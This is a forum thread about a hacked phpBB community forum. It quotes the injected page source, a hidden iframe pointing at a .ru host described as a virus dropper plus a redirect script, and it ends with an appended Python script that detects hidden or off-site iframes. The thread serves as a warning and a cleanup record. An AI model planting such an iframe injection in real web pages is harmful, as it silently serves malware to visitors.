Jester Spearmann

Nexii's Forum Compromised?


This was sent to me by tuomy

[4:16] Tuomy Boa: who has access to ordoimperialis.com?

[4:17] Jester Spearmann: uhhh everyone o.o it's a public website ;p

[4:17] Jester Spearmann: why

[4:17] Tuomy Boa: i mean who could make the domain reroute to vanguards homesite? try nexii.ordoimperialis.com

[4:17] Jester Spearmann: o.O

[4:18] Jester Spearmann: it was hacked by russians apparently

[4:18] Jester Spearmann: scan your system, NOW

[4:18] Jester Spearmann: it's a virus dropper

[4:18] Tuomy Boa: Nopes, it's not by Russians this time

[4:18] Jester Spearmann: FFFF

[4:19] Tuomy Boa: Someone with access to domain made the domain reroute all people to Vanguards forums

[4:20] Tuomy Boa: the russians thing happened few weeks ago

[4:22] Jester Spearmann: mind if i copypaste this to the forum as a warning /

[4:22] Jester Spearmann: ? *

[4:24] Tuomy Boa: go ahead

[4:25] Tuomy Boa: id try contact whoever owns ordoimperialis.com and tell them to change the passes

[4:25] Jester Spearmann: Thanks, intus has been informed

I checked and the page tries to download a virus to your system

[4:22] Vinnie Lei (COM): Page source; <html>

<body><iframe src=&quot;http://q5x.ru:8080/index.php" width=111 height=137 style="visibility: hidden"></iframe>

<script type="text/javascript"><!--

setTimeout('Redirect()',1);

function Redirect()

{

location.href = 'http://www DOT vanguardarmedforces DOT com/forums/index DOT php';

}

// --></script>

</body

Yes I deliberately broke the coding so as not to actually make it a full html setup in the quote

The iframe is the worm dropper, see attached screenshot


I made nexii.ordoimperialis.com redirect to Vanguard's website a few days ago because I thought it was them that hacked it (would have been extremely funny to see them hack themselves lol). Turns out Nexii's website was not hacked by Vanguard, but in fact hacked by a random hacking group unaffiliated with SL. I fixed Nexii's website, and it was hacked again by that hacking group. I fixed it a third time, then it was again hacked last night by the hacking group. That line is the virus dropper; they do it to all the phpBB3 forums they hack. I removed the line.

The random hacking group continues to hack his website; they know when I change it. They will probably do it again. If you're using Firefox 3.0, you'll be fine and won't get a virus, it automatically blocks the virus dropper. Most other browsers warn you; as long as you say "NO" and not "YES" you won't get a virus (lol).

Safest thing is to not go to nexii.ordoimperialis.com until I get the directory deleted.


Update:

nexii.ordoimperialis.com was taken offline. I'm beginning to think it damned well could have been Vanguard that hacked it. Oh well, there's no way we'll ever know. Thread open for discussion.

And also, to clarify for the future, posting HTML is fine; it will do nothing (I disabled it)


A worm is a worm; it's more an issue of how that thing got there in the first place. Any way to tell the IP of the one who modified it last, to see?

Also, how do you get NoScript to work in Firefox anyway?

A team or individual modified the output PHP script of index.php to, rather than show the forum listing as normal, instead emit an <iframe> pointing at a website which attempts to inject the malicious software. It's technically not "there", it's just indirectly "there".
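An added example, not code from this thread or from phpBB: a small audit that fetches nothing and instead parses saved HTML (the kind of output index.php was altered to emit, as pasted in the first post) and flags iframes that are hidden via style, tiny, or point at a host other than the forum's own. The sample HTML below is constructed to mirror the pasted source, with the dropper host replaced by a placeholder.

```python
"""Flag hidden <iframe> injections like the one quoted from the defaced forum."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the pasted page source; the injected host is a placeholder.
SAMPLE_HTML = """<html><body>
<iframe src="http://malicious.example:8080/index.php" width=111 height=137
        style="visibility: hidden"></iframe>
<p>Forum index</p>
</body></html>"""


class IframeAuditor(HTMLParser):
    """Collect every <iframe> together with the reasons it looks injected."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        style = a.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via style")
        for dim in ("width", "height"):
            val = a.get(dim, "").rstrip("px")
            if val.isdigit() and int(val) < 200:  # tiny frame, unusual for real content
                reasons.append(f"small {dim}={val}")
        host = urlparse(a.get("src", "")).hostname or ""
        if host and host.lower() != self.site_host:
            reasons.append(f"off-site src host {host}")
        if reasons:
            self.findings.append((a.get("src", ""), reasons))


def audit_html(html, site_host):
    """Return [(src, reasons)] for suspicious iframes; an empty list means none found."""
    parser = IframeAuditor(site_host)
    parser.feed(html)
    return parser.findings


if __name__ == "__main__":
    for src, why in audit_html(SAMPLE_HTML, "nexii.ordoimperialis.com"):
        print(f"suspicious iframe {src}: {', '.join(why)}")
```

Running this over the forum's served pages after each cleanup shows whether the line has been re-added, which is what the thread describes happening repeatedly.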
